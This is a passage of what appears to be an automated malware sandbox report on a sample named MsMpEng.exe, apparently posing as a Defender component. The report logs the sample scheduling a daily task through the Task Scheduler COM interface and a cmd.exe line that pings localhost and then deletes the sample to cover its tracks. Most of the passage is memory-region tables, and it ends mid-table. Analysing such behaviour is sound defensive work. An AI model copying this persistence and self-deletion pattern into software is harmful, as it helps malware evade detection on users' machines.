| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| schtasks.exe.mui | 0x000e0000 | 0x000f1fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x00110fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x00120fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0016ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000170000 | 0x00170000 | 0x00170fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x00387fff | Pagefile Backed Memory | r |
|
|
|
- |
| rpcss.dll | 0x00390000 | 0x003ebfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x0041ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000460000 | 0x00460000 | 0x0046ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000470000 | 0x00470000 | 0x00570fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x00580000 | 0x0084efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000850000 | 0x00850000 | 0x0092efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000aa0000 | 0x00aa0000 | 0x00adffff | Private Memory | rw |
|
|
|
- |
| schtasks.exe | 0x00ce0000 | 0x00d0dfff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000d10000 | 0x00d10000 | 0x0190ffff | Pagefile Backed Memory | r |
|
|
|
- |
| uxtheme.dll | 0x74060000 | 0x7409ffff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x740a0000 | 0x740cefff | Memory Mapped File | rwx |
|
|
|
- |
| ktmw32.dll | 0x740d0000 | 0x740d8fff | Memory Mapped File | rwx |
|
|
|
- |
| taskschd.dll | 0x74640000 | 0x746bcfff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74f80000 | 0x74f88fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75960000 | 0x7597afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75980000 | 0x7598bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75c20000 | 0x75c69fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x75d30000 | 0x75df8fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x75e00000 | 0x75e8efff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75e90000 | 0x75ea8fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75ec0000 | 0x75f0dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76ba0000 | 0x76c40fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76c50000 | 0x76cfbfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76ea0000 | 0x76f6bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76f70000 | 0x7700ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x77010000 | 0x7702efff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77130000 | 0x771ccfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x771d0000 | 0x77226fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x772b0000 | 0x7740bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x777b0000 | 0x77883fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x778e0000 | 0x77a1bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x77a70000 | 0x77af2fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77b20000 | 0x77b20fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
COM (8)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | TaskScheduler | ITaskService | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = Connect, user = 1501760, domain = 13539662, password = 2266079232 |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = GetFolder, new_interface = ITaskFolder |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = NewTask, new_interface = ITaskDefinition |
|
1 | |
| Execute | TaskScheduler | ITaskDefinition | method_name = get_Actions, new_interface = IActionCollection |
|
1 | |
| Execute | TaskScheduler | ITaskDefinition | method_name = get_Triggers, new_interface = ITriggerCollection |
|
1 | |
| Execute | TaskScheduler | ITriggerCollection | method_name = Create, type = TASK_TRIGGER_TIME, new_interface = IDailyTrigger |
|
1 | |
| Execute | TaskScheduler | IDailyTrigger | method_name = put_StartBoundary, start_boundary = 2019-01-21T12:19:00 |
|
1 |
File (5)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 79 |
|
1 |
Module (9)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | VERSION.dll | base_address = 0x74f80000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76f70000 |
|
1 | |
| Get Handle | c:\windows\system32\schtasks.exe | base_address = 0xce0000 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\schtasks.exe, file_name_orig = C:\Windows\System32\schtasks.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\system32\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x74f819d9 |
|
1 | |
| Get Address | c:\windows\system32\version.dll | function = GetFileVersionInfoW, address_out = 0x74f819f4 |
|
1 | |
| Get Address | c:\windows\system32\version.dll | function = VerQueryValueW, address_out = 0x74f81b51 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = GetUserNameW, address_out = 0x76f8157a |
|
1 |
System (4)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-21 16:19:57 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10945170 |
|
1 | |
| Get Time | type = Local Time, time = 2019-01-21 12:19:57 (Local Time) |
|
2 |
Process #15: cmd.exe
65
0
| Information | Value |
|---|---|
| ID | #15 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /k ping 127.0.0.1 -t 0 & del C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\files\MsMpEng.exe & exit |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:34, Reason: Child Process |
| Unmonitor | End Time: 00:01:36, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa20 |
| Parent PID | 0x30c (c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\files\msmpeng.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ARRARNMKU\JPenUM |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A24
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x00187fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00296fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002c0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x0038ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x0056ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000570000 | 0x00570000 | 0x00670fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000680000 | 0x00680000 | 0x0127ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001280000 | 0x01280000 | 0x0150afff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01510000 | 0x017defff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4a210000 | 0x4a25bfff | Memory Mapped File | rwx |
|
|
|
- |
| winbrand.dll | 0x6ebd0000 | 0x6ebd6fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75c20000 | 0x75c69fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x75d30000 | 0x75df8fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75ec0000 | 0x75f0dfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76c50000 | 0x76cfbfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76ea0000 | 0x76f6bfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x77010000 | 0x7702efff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77130000 | 0x771ccfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x777b0000 | 0x77883fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x778e0000 | 0x77a1bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77b20000 | 0x77b20fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (16)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\files\MsMpEng.exe | type = file_attributes |
|
2 | |
| Get Info | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\files | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
7 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Delete | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\files\MsMpEng.exe | - |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 96, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\PING.EXE | os_pid = 0xa3c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4a210000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x777b0000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x778024c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x777eac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x777f3ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x77802732 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-21 16:19:57 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10945466 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #16: ping.exe
7
1
| Information | Value |
|---|---|
| ID | #16 |
| File Name | c:\windows\system32\ping.exe |
| Command Line | ping 127.0.0.1 -t 0 |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:35, Reason: Child Process |
| Unmonitor | End Time: 00:01:36, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa3c |
| Parent PID | 0xa20 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ARRARNMKU\JPenUM |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A40
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| ping.exe.mui | 0x000e0000 | 0x000e2fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x0017ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x001bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x00287fff | Pagefile Backed Memory | r |
|
|
|
- |
| ping.exe | 0x002a0000 | 0x002a7fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0044ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000450000 | 0x00450000 | 0x00550fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000560000 | 0x00560000 | 0x0115ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01160000 | 0x0142efff | Memory Mapped File | r |
|
|
|
- |
| winnsi.dll | 0x74420000 | 0x74426fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x74430000 | 0x7444bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75c20000 | 0x75c69fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x75d30000 | 0x75df8fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75e90000 | 0x75ea8fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75ec0000 | 0x75f0dfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x76b60000 | 0x76b94fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76ba0000 | 0x76c40fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76c50000 | 0x76cfbfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76ea0000 | 0x76f6bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76f70000 | 0x7700ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x77010000 | 0x7702efff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77130000 | 0x771ccfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x777b0000 | 0x77883fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x778e0000 | 0x77a1bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x77b00000 | 0x77b05fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77b20000 | 0x77b20fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (1)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Write | STD_OUTPUT_HANDLE | size = 18 |
|
1 |
Registry (2)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters | value_name = DefaultTTL, data = 0, type = REG_NONE |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\ping.exe | base_address = 0x2a0000 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-21 16:19:57 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10945669 |
|
1 |
Network Behavior
DNS (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = 127.0.0.1, address_out = 127.0.0.1 |
|
1 |
Process #17: taskeng.exe
0
0
| Information | Value |
|---|---|
| ID | #17 |
| File Name | c:\windows\system32\taskeng.exe |
| Command Line | taskeng.exe {AB092593-1121-4C71-A26E-3236454BE9E3} S-1-5-21-1276836803-1479805768-3330128443-1000:ARRARNMKU\JPenUM:Interactive:LUA[1] |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:37, Reason: Child Process |
| Unmonitor | End Time: 00:02:30, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:53 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x6e4 |
| Parent PID | 0x354 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ARRARNMKU\JPenUM |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
31C
0x
234
0x
5C8
0x
390
0x
548
0x
5BC
0x
160
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00051fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00060fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x0007ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000090000 | 0x00090000 | 0x00090fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x000effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x0023ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00240000 | 0x002a6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x00377fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000380000 | 0x00380000 | 0x00480fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000490000 | 0x00490000 | 0x00882fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000900000 | 0x00900000 | 0x0093ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000009b0000 | 0x009b0000 | 0x009effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000009f0000 | 0x009f0000 | 0x00a6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a80000 | 0x00a80000 | 0x00abffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ac0000 | 0x00ac0000 | 0x00afffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b40000 | 0x00b40000 | 0x00b7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b90000 | 0x00b90000 | 0x00bcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000bd0000 | 0x00bd0000 | 0x00c0ffff | Private Memory | rw |
|
|
|
- |
| taskeng.exe | 0x00c30000 | 0x00c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000c60000 | 0x00c60000 | 0x0185ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01860000 | 0x01b2efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001c00000 | 0x01c00000 | 0x01c3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001c40000 | 0x01c40000 | 0x01d1efff | Pagefile Backed Memory | r |
|
|
|
- |
| tschannel.dll | 0x72000000 | 0x72007fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x73d20000 | 0x73d32fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74060000 | 0x7409ffff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x740a0000 | 0x740cefff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x752a0000 | 0x752dafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75500000 | 0x75515fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75960000 | 0x7597afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75980000 | 0x7598bfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x75a20000 | 0x75a2dfff | Memory Mapped File | rwx |
|
|
